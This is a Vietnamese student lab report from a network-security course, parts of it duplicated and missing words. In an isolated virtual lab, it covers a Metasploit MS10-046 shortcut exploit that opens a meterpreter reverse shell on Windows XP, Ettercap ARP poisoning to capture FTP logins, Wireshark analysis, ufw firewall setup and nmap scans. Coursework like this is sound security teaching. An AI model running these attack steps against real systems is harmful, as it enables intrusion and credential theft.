Đây là báo cáo thực hành môn an toàn an ninh mạng, gồm bài giải của các bài Lab (bài thực hành) trường ĐH Công nghệ ĐHQGHN Đây là báo cáo thực hành môn an toàn an ninh mạng, gồm bài giải của các bài Lab (bài thực hành) trường ĐH Công nghệ ĐHQGHN
BÁO CÁO THỰC HÀNH AN TOÀN AN NINH MẠNG Lab 5.2: Bước 1: Đăng nhập vào BackTrack Windows XP Bước 2: Cấu hình Metasploit cài đặt web server giả Tại máy BackTrack: - Đặt IP cho máy 192.168.100.201 lệnh: ifconfig eth0 192.168.100.201 Thử ping đến máy XP (192.168.100.101) xem chưa (card mạng để hostonly) Gõ lệnh: msfconsole - Gõ lệnh: show exploits Gõ lệnh: search lnk - - Gõ lệnh: use windows/browser/ms10_046_shortcut_icon_dllloader - Gõ lệnh: show options để xem tùy chọn Như hình vẽ ta thấy có tùy chọn liệt kê ra: SRVHOST, SRVPORT, SSLCert, UNCHOST, URIPATH Trong tùy chọn trên, có tùy chọn yêu cầu (có giá trị cột Required yes) - Gõ lệnh: set SRVHOST 192.168.100.201 Gõ lệnh: set SRVPORT 80 Gõ lệnh: set PAYLOAD windows/meterpreter/reverse_tcp Một tùy chọn thêm vào - Gõ lệnh: show options để xem tùy chọn Như hình vẽ trên, ta thấy có tùy chọn thêm vào - Gõ lệnh: set LHOST 192.168.100.201 Gõ lệnh: show options để xem thay đổi Bước 3: Kết nối đến server giả chạy exploit - Gõ lệnh: exploit để bắt đầu Cấu hình thành công hình dưới: Tại máy Windows XP: - Mở IE ra, gõ địa chỉ: http://192.168.100.201/ enter Tại máy BackTrack: - Gõ lệnh: sessions Như hình trên, ta thấy có session mở - Gõ lệnh: sessions –i để tương tác với session có id = - Gõ lệnh: help để xem tùy chọn tương tác Test với tùy chọn: ifconfig Tùy chọn xem thông tin interface máy Windows XP Kết hình vẽ: (địa IP eth0 máy XP 192.168.100.101) - Test với tùy chọn: ls Tùy chọn để liệt kê file máy XP Kết hình vẽ (ở liệt kê file Desktop máy XP) Bước 4: Tắt máy - Chọn Host -> Hosts List Như hình ta thấy có host liệt kê Đó địa IP địa MAC máy Windows XP máy Windows Server 2003 - Chọn địa IP máy Windows Server 2003 (192.168.100.102) click vào Add to Target - Chọn địa IP Windows XP (192.168.100.101) click vào Add to Terget - Trên menu Ettercap, chọn Mitm -> Arp Poisoning Đánh dấu vào Sniff remote connections OK - Trên menu, chọn Start -> Start Sniffing Bước 4: Bắt FTP session Trên máy Windows XP: - Mở cmd, gõ: ftp 192.168.100.102 - Tại User, gõ: labuser Password, gõ: password - Tại ftp, gõ: dir - Gõ: bye để kết thúc Tại máy BackTrack: - Trong cửa sổ Ettercap, phía cùng, ftp session bị bắt với user password Tại máy Windows Server 2003: - Mở cmd, gõ: arp –a Như hình ta thấy, có dòng liệt kê ra, chứa địa IP địa MAC o Trong đó, có dòng sai dòng Dòng thứ chứa địa IP máy Windows XP lại có địa MAC máy BackTrack Dòng thứ chứa địa IP địa MAC máy BackTrack o Tại máy Windows XP: - Mở cmd, gõ: arp –a o Như hình ta thấy có dòng liệt kê, chứa địa IP máy Windows Server 2003 địa MAC lại máy BackTrack Bước 5: Xem output Ettercap phân tích gói tin bắt Wireshark Tại máy BackTrack: - - Trên menu Ettercap, chọn Start -> Stop Sniffing Trên menu Ettercap, chọn Mitm -> Stop Mitm Attacks Trên menu Wireshark, chọn Capture -> Stop Trong ô Filter Wireshark, gõ: arp Enter Trong phần danh sách gói tin bắt được, cuộn xuống dưới, sau gói tin broadcast cuối Các gói tin truy vấn DSN tạo máy công để lấy thông tin từ máy nạn nhân Xuống vài gói tín, đối chiếu với bảng địa MAC ghi trên, ý gói tin mà có source Vmware_xx:xx:xx (địa MAC BackTrack) destination Vmware_yy:yy:yy (địa MAC windows Server) Vmware_zz:zz:zz (địa MAC windows XP) Máy client đơn giản thông báo địa MAC đến máy XP máy Server 2003 Đây phá hỏng ARP Vì vậy, lúc máy tính target có địa IP máy lại, ánh xạ đến địa MAC máy công Đó lí nhìn vào ARP cache máy nạn nhân, lại thấy địa MAC máy công lại thay địa MAC - - Trong ô Filter, gõ: tcp.port==21 (chú ý dấu cách) Enter Nhìn vào danh sách gói tin liệt kê, ta thấy gói tin có Các gói tin gán nhãn phần Info có dạng [TCP …] Chọn gói tin Để ý phần địa MAC đích nguồn (xem phần bên dưới, ấn vào dấu cộng thứ chỗ Ethernet II) Chọn gói tin thứ (bản sao) Để ý phần địa MAC đích nguồn - Ta thấy, địa MAC đích gói tin máy BackTrack Còn gói tin thứ (bản sao) địa MAC nguồn máy BackTrack Các cặp gói tin lại tương tự, có địa MAC đích gói địa MAC nguồn gói thứ máy công Nó nhận gói tin sau chuyển chúng đến đích dự định Đây công người Thoát khỏi Wireshark, không cần save file capture Bước 6: Tắt máy Lab 7.3: Cấu hình tường lửa cá nhân Linux Bước 1: Đăng nhập vào BackTrack Metasploitable - Tài khoản BackTrack là: root/toor Tài khoản Metasploitable là: msfadmin/msfadmin Bước 2: Cấu hình ufw cho phép SSH Trên máy Metasploitable: - Gõ: sudo su Nếu hỏi pass gõ: msfadmin Kiểm tra xem ufw chạy hay chưa, gõ: ufw status o Như hình trên, Firewall not loaded tức chưa bật ufw - Để bật ufw, gõ: ufw logging on - Cho phép sử dụng ssh, gõ: ufw allow ssh - Bật ufw, gõ: ufw enable Kiểm tra lại status, gõ: ufw status - Gõ: iptables –L o Phân tích ouput: o Kết phức tạp o Bước 3: Kiểm tra tường lửa xem file log Tại máy Metasploitable: - Mở cổng 80, gõ lệnh: ufw allow 80 Sau gõ tiếp: ufw allow ftp Gõ lệnh: ufw status Nếu có 80:tcp allow Tại máy BackTrack: - Mở terminal, gõ: nmap –sT 192.168.100.202 (kiểm tra xem IP BackTrack có chưa, chưa đặt lại IP 192.168.100.202) - - Nếu chưa có lynx, phải cài Đưa card mạng BackTrack NAT bridge Mở file /etc/network/interfaces, comment dòng address, netmask, network sửa dòng “Add: iface eth0 inet static” thành “Add: iface eth0 inet dhcp” Gõ lệnh: ifdown eth0, gõ tiêp: ifup eth0 để restart lại mạng, kiểm tra xem có mạng chưa Sau gõ lệnh: apt-get install lynx để cài lynx (có thể phải gõ lệnh apt-get update trước) Cài xong, đưa card mạng Host-only sửa file /etc/network/interfaces ban đầu, đặt lại địa IP lệnh: ifconfig eth0 192.168.100.201 Gõ: lynx 192.168.100.202 Kết quả: - Gõ: ftp 192.168.100.202 o Name: msfadmin, Password: msfadmin Đăng nhập thành công! o Gõ: exit để thoát - Gõ: nmap –sT 192.168.100.202 o Thông tin mà Nmap trả là: tên port, trạng thái dịch vụ mà sử dụng Bước 5: Tắt máy Lab 8.2: Sử dụng Secure Shell (SSH) Bước 1: Đăng nhập vào máy BackTrack Metasploitable - Tài khoản BackTrack là: root/toor Tài khoản Metasploitable là: msfadmin/msfadmin Bước 2: Lấy host key SSH server Trên máy Metasploitable: - Gõ: ssh-keygen –lf /etc/ssh/ssh_host_rsa_key.pub Lab 9.2: Hệ thống phát xâm nhập [...]... Đưa card mạng BackTrack về NAT hoặc bridge Mở file /etc/network/interfaces, comment 3 dòng address, netmask, network và sửa dòng “Add: iface eth0 inet static” thành “Add: iface eth0 inet dhcp” Gõ lệnh: ifdown eth0, rồi gõ tiêp: ifup eth0 để restart lại mạng, kiểm tra xem có mạng chưa Sau đó gõ lệnh: apt-get install lynx để cài lynx (có thể phải gõ lệnh apt-get update trước) Cài xong, đưa card mạng về... output của Ettercap và phân tích gói tin bắt được tại Wireshark Tại máy BackTrack: - - Trên thanh menu của Ettercap, chọn Start -> Stop Sniffing Trên thanh menu của Ettercap, chọn Mitm -> Stop Mitm Attacks Trên thanh menu của Wireshark, chọn Capture -> Stop Trong ô Filter của Wireshark, gõ: arp Enter Trong phần danh sách các gói tin bắt được, cuộn xuống dưới, sau gói tin broadcast cuối cùng Các gói tin... Wireshark Trên thanh menu của Wireshark, chọn Capture -> Interfaces, đánh dấu vào eth0, bấm Start - - Bật terminal, gõ: ettercap –help o Để thực hiện tấn công người ở giữa (man-in-the-middle), sử dụng tùy chọn -M hoặc mitm o Để khởi động Ettercap trong chế độ GTK + GUI, sử dụng tùy chọn: -G hoặc gtk o Để ngăn chặn khởi động quét ARP, sử dụng tùy chọn: -z hoặc silent Gõ: ettercap –G Trên thanh menu của... chọn eth0 OK - Chọn Host -> Scan for hosts - Chọn Host -> Hosts List Như hình trên ta thấy có 2 host được liệt kê ra Đó là địa chỉ IP và địa chỉ MAC của máy Windows XP và máy Windows Server 2003 - Chọn địa chỉ IP của máy Windows Server 2003 (192.168.100.102) và click vào Add to Target 1 - Chọn địa chỉ IP của Windows XP (192.168.100.101) và click vào Add to Terget 2 - Trên thanh menu của Ettercap, chọn... phải gõ lệnh apt-get update trước) Cài xong, đưa card mạng về Host-only và sửa file /etc/network/interfaces về ban đầu, đặt lại địa chỉ IP bằng lệnh: ifconfig eth0 192.168.100.201 Gõ: lynx 192.168.100.202 Kết quả: - Gõ: ftp 192.168.100.202 o Name: msfadmin, Password: msfadmin Đăng nhập thành công! o Gõ: exit để thoát - Gõ: nmap –sT 192.168.100.202 o Thông tin mà Nmap trả về là: tên các port, trạng... source là Vmware_xx:xx:xx (địa chỉ MAC của BackTrack) và destination là Vmware_yy:yy:yy (địa chỉ MAC của windows Server) hoặc Vmware_zz:zz:zz (địa chỉ MAC của windows XP) Máy client chỉ đơn giản là thông báo địa chỉ MAC của nó đến máy XP và máy Server 2003 Đây là sự phá hỏng ARP Vì vậy, lúc này cả 2 máy tính target có địa chỉ IP của máy còn lại, cùng ánh xạ đến địa chỉ MAC của máy tấn công Đó là lí do... nhìn vào ARP cache của mỗi máy nạn nhân, thì lại thấy địa chỉ MAC của máy tấn công lại thay vì địa chỉ MAC của đúng của nó - - Trong ô Filter, gõ: tcp.port==21 (chú ý không có dấu cách) Enter Nhìn vào danh sách các gói tin được liệt kê, ta thấy mỗi gói tin đều có 1 bản sao Các gói tin bản sao được gán nhãn ở phần Info có dạng [TCP …] Chọn gói tin đầu tiên Để ý phần địa chỉ MAC đích và nguồn (xem ở phần